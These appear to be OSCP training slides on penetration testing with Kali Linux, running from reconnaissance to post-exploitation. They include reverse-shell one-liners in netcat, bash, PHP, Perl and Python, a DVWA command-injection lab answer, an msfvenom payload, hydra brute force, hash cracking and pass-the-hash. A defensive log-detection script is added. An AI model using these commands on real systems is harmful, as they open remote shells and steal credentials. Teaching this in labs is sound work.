
OSCP Training

Basic Penetration Testing with Kali Linux

Agenda
Introduction
Part I : Basic Command for Penetration tester
Part II : Information Gathering
Part III : Scanning
Part IV : Enumeration
Part V : Pre-Exploitation Password Attack
Part VI : Exploitation
Part VII : Privilege Escalation
Part VIII : Post-Exploitation
Introduction
Part I : Basic Command for Penetration tester
Kali Linux
Update and Upgrade Kali
#Checking apt source
kali# nano /etc/apt/sources.list

#Update and Upgrade Kali
kali# apt-get update
kali# apt-get upgrade
Create a web server to serve files to the target
#Python
kali# python -m SimpleHTTPServer
kali# python -m SimpleHTTPServer 8000
(SimpleHTTPServer exists only in Python 2; Python 3 provides the same server as the http.server module.)
Connection testing with netcat
#Binding (the victim listens, the tester connects)
Tester: 10.10.10.20    Victim: 10.10.10.10

kali# nc 10.10.10.10 4444

[Windows OS]
C:\>nc.exe -vnlp 4444 -e cmd.exe

[Unix OS]
root# nc -vnlp 4444 -e /bin/bash
Connection testing with netcat
#Reverse (the tester listens, the victim connects back)
Tester: 10.10.10.20    Victim: 10.10.10.10

kali# nc -vnlp 4444

[Windows OS]
C:\>nc.exe 10.10.10.20 4444 -e cmd.exe

[Unix OS]
root# nc 10.10.10.20 4444 -e /bin/bash
Connection testing with netcat
#Upload File (the tester pushes file.txt to the victim)
Tester: 10.10.10.20    Victim: 10.10.10.10

kali# nc 10.10.10.10 4444 < file.txt

[Windows OS]
C:\>nc.exe -vnlp 4444 > file.txt

[Unix OS]
root# nc -vnlp 4444 > file.txt
Connection testing with netcat
#Download File (the tester pulls file.txt from the victim)
Tester: 10.10.10.20    Victim: 10.10.10.10

kali# nc 10.10.10.10 4444 > file.txt

[Windows OS]
C:\>nc.exe -vnlp 4444 < file.txt

[Unix OS]
root# nc -vnlp 4444 < file.txt
Reverse shell
#Reverse
Tester: 10.10.10.20    Victim: 192.168.0.10

kali# nc -vnlp 443
Reverse shell
#Netcat-reverse shell
nc 10.10.10.20 443 -e /bin/sh

#Bash-reverse shell
bash -i >& /dev/tcp/10.10.10.20/443 0>&1

#PHP-reverse shell
php -r '$sock=fsockopen("10.10.10.20",443);exec("/bin/sh -i <&3 >&3 2>&3");'

#Perl-reverse shell
perl -e 'use Socket;$i="10.10.10.20";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

#Python-reverse shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.20",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Reverse shell generator website: https://www.revshells.com/
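Each of the one-liners above leaves a distinct fingerprint in process-creation logs, which is what a blue team looks for. The following is an added example, not code from the original deck: a small Python detector that matches those fingerprints against constructed process-execution log lines of the assumed form `timestamp user command`.

```python
import re

# Fingerprints of the reverse-shell one-liners from the slides, keyed by technique.
# Every regex in an entry must match the command line for that technique to fire.
SIGNATURES = {
    "netcat -e shell":    [r"\b(nc|ncat|netcat)\b.*\s-e\s+(/bin/(ba)?sh|cmd(\.exe)?)"],
    "bash /dev/tcp":      [r"/dev/tcp/\d{1,3}(\.\d{1,3}){3}/\d+"],
    "php fsockopen":      [r"\bphp\b.*fsockopen\(", r"exec\("],
    "perl socket":        [r"\bperl\b.*socket\(", r"exec\("],
    "python socket dup2": [r"\bpython[23]?\b.*socket\.socket\(", r"dup2\(", r"subprocess"],
}

def classify(cmdline):
    """Return the names of every technique whose fingerprints all match cmdline."""
    return [name for name, patterns in SIGNATURES.items()
            if all(re.search(p, cmdline) for p in patterns)]

def scan_log(text):
    """Return (timestamp, user, [techniques]) for each log line that matches.

    Assumed log format (constructed for this example): '<timestamp> <user> <command...>'.
    """
    findings = []
    for line in text.splitlines():
        parts = line.split(" ", 2)          # timestamp, user, rest of line = command
        if len(parts) < 3:
            continue                        # malformed line, nothing to classify
        ts, user, cmd = parts
        hits = classify(cmd)
        if hits:
            findings.append((ts, user, hits))
    return findings

# Constructed sample: a web-server account spawning the payloads shown on the slides,
# plus two benign commands that must not be flagged.
SAMPLE_LOG = """\
2024-03-01T10:00:01Z www-data /bin/sh -c ls -la /var/www
2024-03-01T10:00:07Z www-data nc 10.10.10.20 443 -e /bin/sh
2024-03-01T10:00:09Z www-data bash -i >& /dev/tcp/10.10.10.20/443 0>&1
2024-03-01T10:00:12Z www-data php -r '$sock=fsockopen("10.10.10.20",443);exec("/bin/sh -i <&3 >&3 2>&3");'
2024-03-01T10:00:15Z backup nc -z 10.10.10.5 22
2024-03-01T10:00:20Z www-data python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.20",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
"""

if __name__ == "__main__":
    for ts, user, hits in scan_log(SAMPLE_LOG):
        print(ts, user, ", ".join(hits))
```

The signatures are deliberately narrow; in production they would be one layer beside network telemetry such as an unexpected outbound connection from a web-server process.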


LAB : reverse shell in example scenario
Use Metasploitable 2 as the victim
▪ access http://192.168.31.159/dvwa/login.php with admin/password
▪ set DVWA security to LOW
▪ use the command execution lab as the vulnerability
Use Kali as the tester: listen for the victim and try a reverse shell using
▪ Netcat
▪ Bash
▪ PHP
▪ Perl
▪ Python
Hint:
Answer:
127.0.0.1 && nc 192.168.31.132 443 -e /bin/sh

127.0.0.1 && php -r '$sock=fsockopen("192.168.31.132",443);exec("/bin/sh -i <&3 >&3 2>&3");'


Part II : Information Gathering
Information gathering
#Other ways
Google: http://www.google.com
DNSDumpster: https://dnsdumpster.com/
Network Tools: https://network-tools.com/
Shodan: https://www.shodan.io
Netcraft: https://www.netcraft.com/
Web Archive: http://web.archive.org
Information gathering
#Internal Network Information gathering (Passive mode)

Tcpdump
kali# tcpdump -i eth0 -vv | grep -v 192.168.31.132    (exclude the tester's own address)
kali# tcpdump -i eth0 -w outfile.pcap

Tshark
kali# tshark
Information gathering
#tcpdump
Information gathering
#tshark
Capture Packets with Tshark
tshark -i eth0 -w capture-output.pcap

Read a Pcap with Tshark
tshark -r capture-output.pcap

HTTP Analysis with Tshark
tshark -i eth0 -Y http.request -T fields -e http.host -e http.user_agent
Information gathering
#wireshark
Information gathering
#Responder
kali# sudo responder -I eth0 -wrf
Part III : Scanning
Scanning
#Network Scanning with nmap
Scanning
#Network Scanning with Zenmap
Scanning
#Network Scanning with arp-scan
kali# arp-scan 192.168.31.0/24
Web Scanning
#Basic web scanning by Nikto
kali# nikto -h http://victim.com
kali# nikto -h https://victim.com:443
Web Scanning
#Basic web path enumeration with dirb
kali# dirb http://victim.com
Web Scanning
#Basic web path enumeration with dirbuster
Part IV : Enumeration
What is Enumeration?
Enumeration
Enumeration
#Basic Enumeration by searchsploit
kali# searchsploit keyword
Enumeration
#Basic Enumeration by Exploit-DB web
Part V : Pre-Exploitation Password Attack
Password Attack
#Basic password attack by hydra
kali# gzip -d /usr/share/wordlists/rockyou.txt.gz

kali# hydra -l <login-name> -P <wordlist> -s 22 -vV 192.168.1.1 ssh

kali# hydra -l root -P pass.txt 10.10.1.131 telnet
Password Attack
# Hashcat
Password Attack
# John
Part VI : Exploitation
Exploitation
#Basic Exploitation by Metasploit
Exploitation: Badblue
Exploitation: CI Server
Exploitation
#Basic Network device exploitation with routersploit

kali# git clone https://github.com/reverse-shell/routersploit.git
kali# cd routersploit/
kali:~/routersploit# python3 rsf.py
Exploitation
#Basic Exploitation by Metasploit
#Binding: Tester -> Victim (the victim listens, the tester connects)
#Reverse: Victim -> Tester (the tester listens, the victim connects back)
Exploitation
#Basic Exploitation by msfvenom reverse_shell (locally)
kali# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.117.137 LPORT=5555 -f exe -o reverseshell.exe
kali# python -m SimpleHTTPServer 8000

At the target (Windows 7), browse to http://192.168.117.136:8000/, then download and run the file.
Part VII : Privilege Escalation
Privilege Escalation
#UNIX #WINDOWS
Privilege Escalation
#Local Privilege Escalation with Metasploit
Download the BeRoot tool
https://github.com/AlessandroZ/BeRoot/releases
Run beRoot.exe
>beRoot.exe
Part VIII : Post-Exploitation
Post Exploitation
#hashdump
Copy the dumped hashes to a file
Post Exploitation
#Crack with John the Ripper
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
Post Exploitation: Enabling Remote Desktop
Post Exploitation
#Pass the hash (the credential is supplied as LMHASH:NTHASH)
pth-winexe -U administrator%"aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42" //192.168.200.132 cmd.exe
Post Exploitation
#Token Impersonation
Hack The Box | Previse

Connect VPN

Hack The Box

Player
OS : Kali Linux
OS : Linux
Hack The Box
Scan
Nmap - Port Scan
Enumeration
gobuster
Dirbuster
Exploit
Exploring the Admin Area and Source Code
netcat to my own machine
brute-forcing password
Privilege Escalation
SUID
GitHub
git init --> Initialize a local Git repository
git clone --> Create a local copy of a remote repository
git clean --> Removes untracked files from the working directory
git commit --> Takes the staged snapshot and commits it to the project history
Pentest website list
https://www.exploit-db.com
https://www.revshells.com
https://guif.re/
https://gtfobins.github.io/
https://oscpnotes.infosecsanyam.in/
https://oscp.infosecsanyam.in/
